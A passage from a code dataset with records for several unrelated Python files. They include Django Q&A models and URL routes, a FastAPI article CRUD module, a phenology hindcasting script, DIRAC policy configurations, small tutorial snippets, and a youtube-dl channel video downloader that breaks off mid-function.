created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return str(self.title)\n\n\nclass Answer(models.Model):\n answer = models.CharField(max_length=300)\n question = models.ForeignKey(\n Question, on_delete=models.CASCADE, related_name=\"question_answer\", blank=True)\n auth = models.ForeignKey(\n Account, on_delete=models.CASCADE, related_name=\"auth_answer\", blank=True)\n like = models.ManyToManyField(\n Account, related_name=\"answer_like\", default=None, blank=True)\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def user_add_answer(sender, instance, *args, **kwargs):\n ans = instance\n answer = ans.answer\n question = ans.question\n sender = ans.auth\n\n notify = Notification(answer=ans, question=question, sender=sender, receiver=ans.question.auth, notification_type=3)\n notify.save()\n\n def user_remove_answer(sender, instance, *args, **kwargs):\n ans = instance\n answer = ans.answer\n question = ans.question\n sender = ans.auth\n\n notify = Notification.objects.filter(answer=ans, question=question, sender=sender, notification_type=3)\n notify.delete()\n\n def __str__(self):\n 
return str(self.answer)\n\n def number_of_likes(self):\n return self.like.all().count()\n\n\nLIKE_CHOICES = (\n ('like', 'like'),\n ('unlike', 'unlike'),\n)\n\n\nclass LikeQuestion(models.Model):\n auth = models.ForeignKey(\n Account, related_name=\"question_auth\", on_delete=models.CASCADE)\n question = models.ForeignKey(\n Question, related_name=\"ques\", on_delete=models.CASCADE)\n value = models.CharField(choices=LIKE_CHOICES,\n default='Like', max_length=10)\n\n def user_like_question(sender, instance, *args, **kwargs):\n like = instance\n question = like.question\n sender = like.auth\n\n notify = Notification(question=question, sender=sender,\n receiver=question.auth, notification_type=2)\n notify.save()\n\n def user_unlike_question(sender, instance, *args, **kwargs):\n like = instance\n question = like.question\n sender = like.auth\n\n notify = Notification.objects.filter(\n question=question, sender=sender, notification_type=2)\n notify.delete()\n\n def __str__(self):\n # this model has no POST or ans attribute; show the related question\n return str(self.question)\n\n\nclass Like(models.Model):\n auth = models.ForeignKey(\n Account, related_name=\"auth_like\", on_delete=models.CASCADE)\n ans = models.ForeignKey(\n Answer, related_name=\"ans_like\", on_delete=models.CASCADE)\n value = models.CharField(choices=LIKE_CHOICES,\n default='Like', max_length=10)\n\n def user_like_answer(sender, instance, *args, **kwargs):\n like = instance\n ans = like.ans\n sender = like.auth\n\n notify = Notification(answer=ans, sender=sender,\n receiver=ans.auth, notification_type=1)\n notify.save()\n\n def user_unlike_answer(sender, instance, *args, **kwargs):\n like = instance\n ans = like.ans\n sender = like.auth\n\n notify = Notification.objects.filter(\n answer=ans, sender=sender, notification_type=1)\n notify.delete()\n\n def __str__(self):\n # this model has no POST attribute; show the related answer\n return str(self.ans)\n\n\npost_save.connect(Like.user_like_answer, sender=Like)\npost_delete.connect(Like.user_unlike_answer, sender=Like)\n\npost_save.connect(LikeQuestion.user_like_question, sender=LikeQuestion)\npost_delete.connect(LikeQuestion.user_unlike_question, sender=LikeQuestion)\n\n\npost_save.connect(Answer.user_add_answer, sender=Answer)\npost_delete.connect(Answer.user_remove_answer, sender=Answer)\n","sub_path":"question/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"528119600","text":"from fastapi import status, HTTPException\nfrom database.models import DbArticle\nfrom schemas import ArticleBase\nfrom sqlalchemy.orm.session import Session\n\n\n\ndef create_article(db: Session, request: ArticleBase):\n article = DbArticle(\n title = request.title,\n content = request.content,\n published = request.published,\n user_id = request.creator_id\n )\n db.add(article)\n db.commit()\n db.refresh(article)\n return article\n\n\ndef get_article(db: Session, id: int):\n article = db.query(DbArticle).filter(DbArticle.id == id).first()\n if not article:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Article with id {id} does not exist.\")\n return article\n\n\ndef get_articles(db: Session):\n return db.query(DbArticle).all()\n\n\ndef update_article_by_id(db: Session, id: int, request: ArticleBase):\n article = db.query(DbArticle).filter(DbArticle.id == id)\n article.update({\n DbArticle.title: request.title,\n DbArticle.content: request.content,\n DbArticle.published: request.published,\n DbArticle.user_id : request.user_id\n 
})\n db.commit()\n # a Query object is always truthy, so check whether a matching row actually exists\n if not article.first():\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Article with id {id} does not exist.\")\n return article\n","sub_path":"practice/database/db_article.py","file_name":"db_article.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"130999760","text":"from django.urls import path, include\nfrom . import views\nfrom rest_framework import routers\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\n\nrouter = routers.DefaultRouter()\nrouter.register(r'traffic', views.TrafficViewSet)\nrouter.register(r'road', views.RoadViewSet)\nrouter.register(r'light', views.LightViewSet)\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('camera/', views.camera, name='camera'),\n path('profile/', views.profile, name='profile'),\n path('api/', include(router.urls)),\n path('api/token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('api/refresh/', TokenRefreshView.as_view(), name='token_refresh')\n]\n","sub_path":"traffic/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"446000358","text":"from typing import Dict, Tuple, List\n\nfrom nico.matrix import Matrix, parse_str\n\n\ndef parser(filename: str) -> Matrix:\n res = Matrix()\n with open(filename) as fp:\n lines = fp.readlines()\n\n constraint = res.col_constraints\n for line in lines:\n if line.startswith('#'):\n constraint = res.line_constraints\n continue\n constraint.append(parse_str(line))\n\n res.init()\n return res\n","sub_path":"nico/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5030519","text":"from django.shortcuts import render\nfrom .models import LoadBook\nfrom common.models import BookList\n\n# Create your views here.\n\ndef SearchBarcode(request):\n check = LoadBook.objects.all()\n\n barcode = request.GET.get('search')\n if barcode:\n search_book = BookList.objects.get(barcode=barcode)\n LoadBook.objects.create(title=search_book.title, barcode=barcode, location=search_book.location)\n\n data = LoadBook.objects.all()\n return render(request, 'worker/search_screen.html', {'data': data})\n\ndef drawmap(request):\n data = LoadBook.objects.all()\n # TODO: write code that sends all of the book location values at once over serial communication\n\n # title to show on drawmap: builds the \"000 and N other books\" heading\n count = len(LoadBook.objects.all())\n\n searched_book = data[0].title + '외' + str(count-1) + '권' # Korean suffixes meaning \"and (count-1) other volumes\"\n\n return render(request, 'common/draw_map.html', {'searched_book': searched_book, 'type': 'worker'})\n\n\n # Sends to the map-drawing template in common; since a worker is the sender, the dictionary data has type 'worker'.\n # Change the searched_book data as appropriate.\n","sub_path":"worker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"413171144","text":"import pandas as pd\nimport numpy as np\nimport xarray as xr\nimport glob\nimport datetime\nfrom time import sleep\nimport time\nfrom tools import tools\nfrom pyPhenology import utils\n\nimport hindcast_config\nconfig = tools.load_config()\n\n\n######\n# Species & phenology modeling stuff\nhindcast_species = pd.read_csv(config['data_folder']+'species_for_hindcasting.csv')\nphenology_model_metadata = 
pd.read_csv(config['phenology_model_metadata_file'])\nforecast_metadata = hindcast_species.merge(phenology_model_metadata, \n left_on =['species','Phenophase_ID','current_forecast_version'],\n right_on=['species','Phenophase_ID','forecast_version'], \n how='left')\n\n#################\n# info on where and what to run hindcasts with. \nsite_info = pd.read_csv(config['data_folder']+hindcast_config.observation_site_info_file)\nsite_info.rename(index=str, columns={'Site_ID':'site_id','Latitude':'lat','Longitude':'lon'}, inplace=True)\nsite_info = site_info[['site_id','lat','lon']]\n\n# not all sites have all species, so load the observation data to pare down\n# the predictions needed. \nspecies_sites = pd.read_csv(config['data_folder']+hindcast_config.observation_file)\n\n#site_info = site_info.head(100)\n#######\n# Other stuff\n\n#doy_0 = np.datetime64(hindcast_config.doy_0)\n\ntoday = datetime.datetime.today().date()\n\n# For spatial reference\nland_mask = xr.open_dataset(config['mask_file'])\n\n####################\n# Climate files\n# 20 years of daily temperature\nhistoric_temp_filenames = glob.glob(config['historic_observations_folder']+'yearly/prism_tmean*') \nhistoric_temperature = xr.open_mfdataset(historic_temp_filenames)\nhistoric_years = np.unique([t.year for t in historic_temperature.time.to_series()])\n\n# don't use the first year because data from the prior year is needed\nhistoric_years = historic_years[1:]\n\n# Align the latitude and longitude as they can become mismatched due \n# to rounding errors\n#historic_temperature['lat'] = current_season_temperature['lat']\n#historic_temperature['lon'] = current_season_temperature['lon']\n\n######################################################\n#from joblib import parallel_backend\n#from dask import delayed, compute\n#from dask.distributed import Client, LocalCluster\nfrom joblib import Parallel, delayed\n\n#cluster = LocalCluster(n_workers=hindcast_config.n_prediction_jobs)\n#client = Client(cluster)\n\n######################################################\ndef dataframe_chunker(seq, size):\n return (seq[pos:pos + size] for pos in range(0, len(seq), size))\n\n@delayed\ndef process_species(model, site_info, site_temp, historic_climate_member, species, Phenophase_ID):\n try:\n prediction_array = model.predict(to_predict=site_info,\n predictors=site_temp,\n aggregation='none',\n n_jobs=-1)\n \n \n pheno_ensemble_names = [m['parameters'][0]['model_name'] for m in model._get_model_info()['core_models']]\n num_bootstraps = len(model.model_list[0].model_list)\n \n # prediction_array is a 3D 'phenology_ensemble' x 'bootstrap' x 'site' array,\n # use xarray to easily label it and convert to dataframe\n prediction_dataframe = xr.DataArray(prediction_array, dims=('phenology_model','bootstrap','site_id'),\n name='doy_prediction',\n coords={'phenology_model':pheno_ensemble_names,\n 'bootstrap': range(num_bootstraps),\n 'site_id': site_info.site_id}).to_dataframe().reset_index()\n \n prediction_dataframe['species'] = species\n prediction_dataframe['Phenophase_ID'] = Phenophase_ID\n prediction_dataframe['issue_date'] = '2000-01-01' # climatology method does not use issue dates, so use an absurd one to make sure I catch it later on.\n prediction_dataframe['climate_member'] = historic_climate_member\n \n return prediction_dataframe\n except:\n return pd.DataFrame()\n\ndef extract_single_site_temp(clim, site):\n site_climate_chunk = clim.sel(lat = site.lat.values, \n lon = site.lon.values, \n method='nearest')\n site['climate_lon'] = 
site_climate_chunk.lon\n site['climate_lat'] = site_climate_chunk.lat\n \n site_climate_chunk = site_climate_chunk.to_dataframe().dropna().reset_index()\n \n site_climate_chunk.rename(index=str, columns={'lat':'climate_lat','lon':'climate_lon'}, inplace=True) \n \n site_temp_chunk = site.merge(site_climate_chunk, how='left',\n on=['climate_lon','climate_lat'])\n\n return site_temp_chunk\n\n# drop leap days from an xr dataset because, just, no.....\ndef pd_drop_leap_days(timeseries):\n leap_days = np.logical_and(timeseries.month == 2, timeseries.day == 29)\n not_leap_days = np.logical_not(leap_days)\n return timeseries[not_leap_days]\n\n######################################################\n# for tracking progress\ntotal_species=len(forecast_metadata)\nstart_time = time.time()\n\n######################################################\n# final results\nall_hindcast_predictions = []\n\nfor historic_year_i, historic_year in enumerate(historic_years):\n time_elapsed = np.round((time.time() - start_time)/60,0)\n print('Historic year {y}/20, elapsed time {t} minutes'.format(y = historic_year_i,\n t = time_elapsed))\n \n \n historic_year_start_date = '{y}-11-01'.format(y = historic_year-1)\n historic_year_end_date = '{y}-08-01'.format(y = historic_year)\n doy_0 = np.datetime64('{y}-01-01'.format(y = historic_year))\n \n \n historic_dates_to_extract = pd.date_range(historic_year_start_date,\n historic_year_end_date,\n freq='1D')\n \n historic_dates_to_extract = pd_drop_leap_days(historic_dates_to_extract)\n \n # crop the historic climate to the current issue date forward\n historic_temperature_subset = historic_temperature.sel(time = historic_dates_to_extract).copy()\n historic_temperature_subset.load()\n \n # convert dates from the 90's and 2000's to dates for the 2018 season\n #historic_months = pd.DatetimeIndex(historic_temperature_subset.time.values).month\n #historic_days = pd.DatetimeIndex(historic_temperature_subset.time.values).day\n #adjusted_days = []\n #for d, m in zip(historic_days, historic_months):\n # y = 2017 if m >=10 else 2018\n # adjusted_days.append('{y}-{m}-{d}'.format(y=y, m=m, d=d))\n \n #historic_temperature_subset['time'] = pd.DatetimeIndex(adjusted_days)\n \n # combine w/ 2018 temps up to the current issue date\n #historic_climate_member = current_season_temperature_subset.combine_first(historic_temperature_subset)\n #historic_climate_member = xr.merge([current_season_temperature_subset, historic_temperature_subset])\n #historic_climate_member.load()\n #print('year {y}, issue_date {i}, {n} days combined in historic member'.format(y=historic_year,\n # i=hindcast_issue_date,\n # n=historic_climate_member.dims['time']))\n \n \n ####################################################\n # Get timeseries of daily temp for each site needed for hindcasting\n # I want the temperature at all sites listed in site_info. 
This does a nearest neighbor lookup,\n # but to associate each time series with a site_id I need to use the lat/lon from the \n # climate file, which are slighly different than the points in site_info\n site_info_for_prediction = site_info.copy()\n\n site_temp = pd.DataFrame()\n \n site_temp = Parallel(n_jobs=8)(delayed(extract_single_site_temp)(clim=historic_temperature_subset, site=s.copy()) for s in dataframe_chunker(site_info_for_prediction,1))\n site_temp = pd.concat(site_temp)\n \n site_temp['doy'] = pd.TimedeltaIndex(site_temp.time.values - doy_0).days.values\n site_temp = site_temp[['site_id','tmean','doy']]\n site_temp.rename(index=str, columns={'tmean':'temperature'},inplace=True)\n \n # some sites dont have data from being over water or in canada\n sites_without_temp = site_temp.site_id[site_temp.temperature.isna()]\n \n site_info_for_prediction = site_info_for_prediction[~site_info_for_prediction.site_id.isin(sites_without_temp)]\n \n \n # insert dummy year columns needed by predict()\n site_info_for_prediction['year'] = hindcast_config.target_season\n site_temp['year'] = hindcast_config.target_season\n \n ####################################################\n # Apply each model to the climate data\n hindcasts_to_compute = []\n for species_i, forecast_info in enumerate(forecast_metadata.to_dict('records')):\n \n species = forecast_info['species']\n Phenophase_ID = forecast_info['Phenophase_ID']\n model_file = config['phenology_model_folder']+forecast_info['model_file']\n model = utils.load_saved_model(model_file)\n\n # only make predictions where this species is located. \n sites_for_this_species = species_sites.query('species == @species & Phenophase_ID == @Phenophase_ID')\n site_info_for_this_species = site_info_for_prediction[site_info_for_prediction.site_id.isin(sites_for_this_species.site_id)]\n site_temp_for_this_species = site_temp[site_temp.site_id.isin(sites_for_this_species.site_id)]\n #print('{s} - {p}'.format(s=species, p=Phenophase_ID))\n #print('################## site info ###################')\n #print(site_info_for_this_species)\n #print('################## site temp ###################')\n #print(site_temp_for_this_species)\n hindcasts_to_compute.append(process_species(model=model,\n site_info = site_info_for_this_species,\n site_temp = site_temp_for_this_species,\n historic_climate_member = historic_year_i+1,\n species = species,\n Phenophase_ID = Phenophase_ID))\n \n all_hindcast_predictions.extend(Parallel(n_jobs=hindcast_config.n_prediction_jobs)(hindcasts_to_compute))\n\nall_hindcast_predictions = pd.concat(all_hindcast_predictions)\n\nall_hindcast_predictions.to_csv(config['data_folder']+ 'evaluation/hindcast_climatology_method_data_2018.csv', index=False)\n","sub_path":"hindcasting/hindcasting_site_level_climatology_method.py","file_name":"hindcasting_site_level_climatology_method.py","file_ext":"py","file_size_in_byte":11146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"540313619","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nclass Dog:\r\n kind = 'canine'\r\n\r\n def __init__(self, name):\r\n self.name = name\r\n self.tricks = []\r\n\r\n def add_trick(self, trick):\r\n self.tricks.append(trick)\r\n\r\nif __name__ == '__main__':\r\n d = Dog(\"Fido\")\r\n e = Dog(\"Buddy\")\r\n d.add_trick('roll over')\r\n e.add_trick('play dead')\r\n print(d.name, d.kind, d.tricks)\r\n print(e.name, e.kind, 
e.tricks)\r\n","sub_path":"python/tutorial/ex4_class_variables.py","file_name":"ex4_class_variables.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574578036","text":"# $HeadURL: $\n\"\"\" Configurations module\n\n Configuration to use policies.\n \n Follows the schema:\n \n : {\n 'description' : ,\n 'module' : ,\n 'command' : ( , < command class name > ),\n 'args' : { arguments for the command } or None \n }\n \n\"\"\"\n\n__RCSID__ = '$Id: $'\n\nPOLICIESMETA = {\n\n\n # DownTime POLICIES...........................................................\n \n 'DTOngoing' :\n {\n 'description' : \"Ongoing and scheduled down-times\",\n 'module' : 'DowntimePolicy',\n 'command' : ( 'DowntimeCommand', 'DowntimeCommand' ),\n 'args' : { 'hours' : 0, 'onlyCache' : True },\n },\n\n 'DTScheduled' :\n {\n 'description' : \"Scheduled down-times, starting in \",\n 'module' : 'DowntimePolicy',\n 'command' : ( 'DowntimeCommand', 'DowntimeCommand' ),\n 'args' : { 'hours' : 12, 'onlyCache' : True },\n },\n\n\n # Space Token POLICIES........................................................\n\n 'SpaceTokenOccupancy' :\n { \n 'description' : \"Space token occupancy\",\n 'module' : 'SpaceTokenOccupancyPolicy',\n 'command' : ( 'SpaceTokenOccupancyCommand', 'SpaceTokenOccupancyCommand' ),\n 'args' : { 'onlyCache' : True },\n }, \n\n\n # Job POLICIES..............................................................\n\n 'JobDoneRatio' :\n {\n 'description' : \"done / ( completed + done ) jobs ( 30 min )\",\n 'module' : 'JobDoneRatioPolicy',\n 'command' : ( 'JobCommand', 'JobCommand' ),\n 'args' : { 'onlyCache' : True, 'timespan' : 1800 }, \n },\n\n 'JobEfficiency' :\n {\n 'description' : \"( completed + done ) / ( completed + done + failed ) jobs ( 30 min )\",\n 'module' : 'JobEfficiencyPolicy',\n 'command' : ( 'JobCommand', 'JobCommand' ),\n 'args' : { 'onlyCache' : True, 'timespan' : 1800 }, \n },\n\n 'JobRunningMatchedRatio' :\n {\n 'description' : \"running / ( running + matched + received + checking ) jobs ( 30 min )\",\n 'module' : 'JobRunningMatchedRatioPolicy',\n 'command' : ( 'JobCommand', 'JobCommand' ),\n 'args' : { 'onlyCache' : True, 'timespan' : 1800 }, \n },\n\n 'JobRunningWaitingRatio' :\n {\n 'description' : \"running / ( running + waiting + staging ) jobs ( 30 min )\",\n 'module' : 'JobRunningWaitingRatioPolicy',\n 'command' : ( 'JobCommand', 'JobCommand' ),\n 'args' : { 'onlyCache' : True, 'timespan' : 1800 }, \n },\n\n\n # Pilot POLICIES..............................................................\n\n 'PilotInstantEfficiency' :\n {\n 'description' : \"Pilots Instant Efficiency ( 30 min )\",\n 'module' : 'PilotEfficiencyPolicy',\n 'command' : ( 'PilotCommand', 'PilotCommand' ),\n 'args' : { 'onlyCache' : True, 'timespan' : 1800 }\n },\n\n\n # ALWAYS SOMETHING POLICIES...................................................\n\n 'AlwaysActive' :\n {\n 'description' : \"A Policy that always returns Active\",\n 'module' : 'AlwaysActivePolicy',\n 'command' : None,\n 'args' : None\n },\n\n 'AlwaysDegraded' :\n {\n 'description' : \"A Policy that always returns Degraded\",\n 'module' : 'AlwaysDegradedPolicy',\n 'command' : None,\n 'args' : None\n },\n \n 'AlwaysProbing' :\n {\n 'description' : \"A Policy that always returns Probing\",\n 'module' : 'AlwaysProbingPolicy',\n 'command' : None,\n 'args' : None\n }, \n\n 'AlwaysBanned' :\n {\n 'description' : \"A Policy that always returns Banned\",\n 'module' : 
'AlwaysBannedPolicy',\n 'command' : None,\n 'args' : None\n }\n \n }\n\n\n#...............................................................................\n#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF","sub_path":"ResourceStatusSystem/Policy/Configurations.py","file_name":"Configurations.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"469506457","text":"data = [57, 48, 46, 52, 45, 59, 61, 60, 49, 71]\r\nn = len(data)\r\nkey = 60\r\nflg = False\r\nfor i in range(n):\r\n if data[i] == key:\r\n print(\"data[{}]が{}です\".format(i, key))\r\n flg = True\r\n break\r\n\r\nif not flg:\r\n print(str(key) + \"は存在しない\")","sub_path":"search_1.py","file_name":"search_1.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"493341635","text":"#! /usr/bin/env python3\nimport glob\nimport hashlib\nimport logging\nimport pathlib\nimport re\nfrom datetime import datetime\nfrom typing import Tuple\n\nfrom dictorm import DictDB, Dict, Or\nfrom youtube_dl import YoutubeDL\n\nfrom lib.db import get_db_context\nfrom lib.plugins.videos.captions import process_captions\nfrom lib.plugins.videos.common import get_downloader_config, get_absolute_channel_directory\n\nlogger = logging.getLogger('lib:downloader')\nch = logging.StreamHandler()\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\nydl_logger = logging.getLogger('lib:ydl')\n\n\ndef get_channel_info(channel: Dict) -> dict:\n \"\"\"\n Get the YoutubeDL info_extractor information dictionary. This is built using many http requests.\n\n :param channel: dictorm Channel table\n :return:\n \"\"\"\n ydl = YoutubeDL()\n # ydl.params['logger'] = ydl_logger\n ydl.add_default_info_extractors()\n\n logger.info(f'Downloading video list for {channel[\"url\"]} This may take several minutes.')\n info = ydl.extract_info(channel['url'], download=False, process=False)\n if 'url' in info:\n url = info['url']\n info = ydl.extract_info(url, download=False, process=False)\n\n # Resolve all entries to dictionaries\n info['entries'] = list(info['entries'])\n return info\n\n\ndef update_channels(db_conn, db, oldest_date=None):\n \"\"\"Get all information for each channel. 
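Channels whose info_date is missing or older than oldest_date are refreshed and committed one at a time, yielding a progress message for each.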
(No downloads performed)\"\"\"\n Channel = db['channel']\n oldest_date = oldest_date or datetime.now().date()\n\n # Update all outdated channel info json columns\n remote_channels = Channel.get_where(\n Channel['url'].IsNotNull(),\n Channel['url'] != '',\n Or(\n Channel['info_date'] < oldest_date,\n Channel['info_date'].IsNull()\n ),\n )\n remote_channels = list(remote_channels)\n logger.debug(f'Getting info for {len(remote_channels)} channels')\n for idx, channel in enumerate(remote_channels):\n progress = int((idx / len(remote_channels)) * 100)\n yield {'progress': progress, 'message': f'Getting video list for {channel[\"name\"]}'}\n info = get_channel_info(channel)\n channel['info_json'] = info\n channel['info_date'] = datetime.now()\n channel.flush()\n db_conn.commit()\n\n yield {'progress': 100, 'message': 'All video lists updated.'}\n\n\nVIDEO_EXTENSIONS = ['mp4', 'webm', 'flv']\n\n\ndef find_matching_video_files(directory, search_str) -> str:\n \"\"\"Create a generator which returns any video files containing the search string.\"\"\"\n for ext in VIDEO_EXTENSIONS:\n yield from glob.glob(f'{directory}/*{search_str}*{ext}')\n\n\ndef find_missing_channel_videos(channel: Dict) -> dict:\n info_json = channel['info_json']\n entries = info_json['entries']\n directory = get_absolute_channel_directory(channel['directory'])\n skip_download_videos = channel['skip_download_videos']\n for entry in entries:\n source_id = entry['id']\n if skip_download_videos and source_id in skip_download_videos:\n # This video previously failed to download, skip it\n continue\n\n matching_video_files = find_matching_video_files(directory, source_id)\n try:\n next(matching_video_files)\n # Some video file was found, move onto the next\n continue\n except StopIteration:\n pass\n\n # No match for this entry, check if the title matches the channel regex\n if channel['match_regex'] and re.match(channel['match_regex'], entry['title']):\n yield entry\n elif channel['match_regex']:\n logger.debug(f'Skipping {entry}, title does not match regex.')\n else:\n # No matches and no regex, download it\n yield entry\n\n\ndef get_channel_video_count(channel: Dict) -> int:\n \"\"\"Count all video files in a channel's directory.\"\"\"\n return len(list(find_matching_video_files(channel['directory'], '')))\n\n\ndef find_all_missing_videos(db: DictDB) -> Tuple[Dict, dict]:\n \"\"\"Search recursively for each video identified in the channel's JSON package. 
If a video's file can't\n be found, yield it.\n\n If max_downloads_per_channel is provided, this will only yield missing videos when there are less video\n files than this number.\"\"\"\n Channel = db['channel']\n channels = Channel.get_where(Channel['info_json'].IsNotNull())\n for channel in channels:\n video_count = 0\n for missing_video in find_missing_channel_videos(channel):\n yield channel, missing_video\n video_count += 1\n\n\ndef download_video(channel: dict, video: dict) -> pathlib.Path:\n \"\"\"\n Download a video (and associated thumbnail/etc) to it's channel's directory.\n\n :param channel: A DictORM Channel entry\n :param video: A YoutubeDL info entry dictionary\n :return:\n \"\"\"\n # YoutubeDL expects specific options, add onto the default options\n config = get_downloader_config()\n options = dict(config)\n directory = get_absolute_channel_directory(channel['directory'])\n options['outtmpl'] = f'{directory}/{config[\"file_name_format\"]}'\n\n ydl = YoutubeDL(options)\n ydl.add_default_info_extractors()\n source_id = video['id']\n url = f'https://www.youtube.com/watch?v={source_id}'\n entry = ydl.extract_info(url, download=True, process=True)\n final_filename = ydl.prepare_filename(entry)\n final_filename = pathlib.Path(final_filename)\n return final_filename\n\n\ndef replace_extension(path: pathlib.Path, new_ext) -> pathlib.Path:\n \"\"\"Swap the extension of a file's path.\n\n Example:\n >>> foo = pathlib.Path('foo.bar')\n >>> replace_extension(foo, 'baz')\n 'foo.baz'\n \"\"\"\n parent = path.parent\n existing_ext = path.suffix\n path = str(path)\n name, _, _ = path.rpartition(existing_ext)\n path = pathlib.Path(str(parent / name) + new_ext)\n return path\n\n\ndef find_meta_files(path: pathlib.Path, relative_to=None) -> Tuple[\n pathlib.Path, pathlib.Path, pathlib.Path, pathlib.Path]:\n \"\"\"\n Find all files that share a file's full path, except their extensions. It is assumed that file with the\n same name, but different extension is related to that file. A None will be yielded if the meta file doesn't exist.\n\n Example:\n >>> foo = pathlib.Path('foo.bar')\n >>> find_meta_files(foo)\n (pathlib.Path('foo.jpg'), pathlib.Path('foo.description'),\n pathlib.Path('foo.jpg'), pathlib.Path('foo.info.json'))\n \"\"\"\n suffix = path.suffix\n name, suffix, _ = str(path.name).rpartition(suffix)\n meta_file_exts = (('.jpg',), ('.description',), ('.en.vtt', '.en.srt'), ('.info.json',))\n for meta_exts in meta_file_exts:\n for meta_ext in meta_exts:\n meta_path = replace_extension(path, meta_ext)\n if meta_path.exists():\n if relative_to:\n yield meta_path.relative_to(relative_to)\n break\n else:\n yield meta_path\n break\n else:\n yield None\n\n\nNAME_PARSER = re.compile(r'(.*?)_((?:\\d+?)|(?:NA))_(?:(.{11})_)?(.*)\\.'\n r'(jpg|flv|mp4|part|info\\.json|description|webm|..\\.srt|..\\.vtt)')\n\n\ndef insert_video(db: DictDB, video_path: pathlib.Path, channel: Dict, idempotency: str = None,\n skip_captions=False) -> Dict:\n \"\"\"Find and insert a video into the DB. 
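The file name is parsed with NAME_PARSER to recover the upload date, source id, title, and extension;
 a hypothetical example of a name it accepts is 'Show_20180101_dQw4w9WgXcQ_Some Title.mp4'.
 A short sha3_512 hash of the relative video path is also stored for collision-free linking.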
Also, find any meta-files near the video file and store them.\"\"\"\n Video = db['video']\n channel_dir = get_absolute_channel_directory(channel['directory'])\n poster_path, description_path, caption_path, info_json_path = find_meta_files(video_path, relative_to=channel_dir)\n\n # Video paths should be relative to the channel's directory\n if video_path.is_absolute():\n video_path = video_path.relative_to(channel_dir)\n\n name_match = NAME_PARSER.match(video_path.name)\n _ = upload_date = source_id = title = ext = None\n if name_match:\n _, upload_date, source_id, title, ext = name_match.groups()\n\n # Youtube-DL can sometimes set date to `NA`, lets use a None\n if upload_date == 'NA':\n upload_date = None\n\n # Hash the video's path for easy and collision-free linking\n video_path_hash = hashlib.sha3_512(str(video_path).encode('UTF-8')).hexdigest()\n video_path_hash = video_path_hash[:10]\n\n video = Video(\n channel_id=channel['id'],\n description_path=str(description_path) if description_path else None,\n ext=ext,\n poster_path=str(poster_path) if poster_path else None,\n source_id=source_id,\n title=title,\n upload_date=upload_date,\n video_path=str(video_path),\n name=video_path.name,\n caption_path=str(caption_path) if caption_path else None,\n idempotency=idempotency,\n info_json_path=str(info_json_path) if info_json_path else None,\n video_path_hash=video_path_hash,\n )\n video.flush()\n\n if skip_captions is False and caption_path:\n # Process captions only when requested\n process_captions(video)\n\n return video\n\n\ndef _skip_download(error):\n \"\"\"Return True if the error is unrecoverable and the video should be skipped in the future.\"\"\"\n if 'requires payment' in str(error):\n return True\n elif 'Content Warning' in str(error):\n return True\n elif 'Did not get any data blocks' in str(error):\n return True\n return False\n\n\ndef download_all_missing_videos(db_conn, db):\n \"\"\"Find any videos identified by the info packet that haven't yet been downloaded, download them.\"\"\"\n yield {'progress': 0, 'message': 'Comparing local videos to available videos...'}\n missing_videos = list(find_all_missing_videos(db))\n total_missing_videos = len(missing_videos)\n for idx, (channel, missing_video) in enumerate(missing_videos):\n try:\n video_path = download_video(channel, missing_video)\n except Exception as e:\n logger.warning(f'Failed to download \"{missing_video[\"title\"]}\" with exception: {e}')\n if _skip_download(e):\n # The video failed to download, and the error will never be fixed. Skip it forever.\n skip_download_videos = channel['skip_download_videos']\n source_id = missing_video.get('id')\n logger.warn(f'Adding video \"{source_id}\" to skip list for this channel. WROLPi will not '\n f'attempt to download it again.')\n if skip_download_videos and source_id:\n channel['skip_download_videos'].append(missing_video['id'])\n elif source_id:\n channel['skip_download_videos'] = [missing_video['id'], ]\n channel.flush()\n db_conn.commit()\n\n yield f'Failed to download \"{missing_video[\"title\"]}\", see logs...'\n continue\n insert_video(db, video_path, channel, None)\n progress = int((idx / total_missing_videos) * 100)\n yield {'progress': progress, 'message': f'{channel[\"name\"]}: Downloaded: {missing_video[\"title\"]}'}\n db_conn.commit()\n\n yield {'progress': 100, 'message': 'All videos are downloaded'}\n\n\ndef main(args=None):\n \"\"\"Find and download any missing videos. 
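Runs the channel info update pass first, then the download pass, logging each status message.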
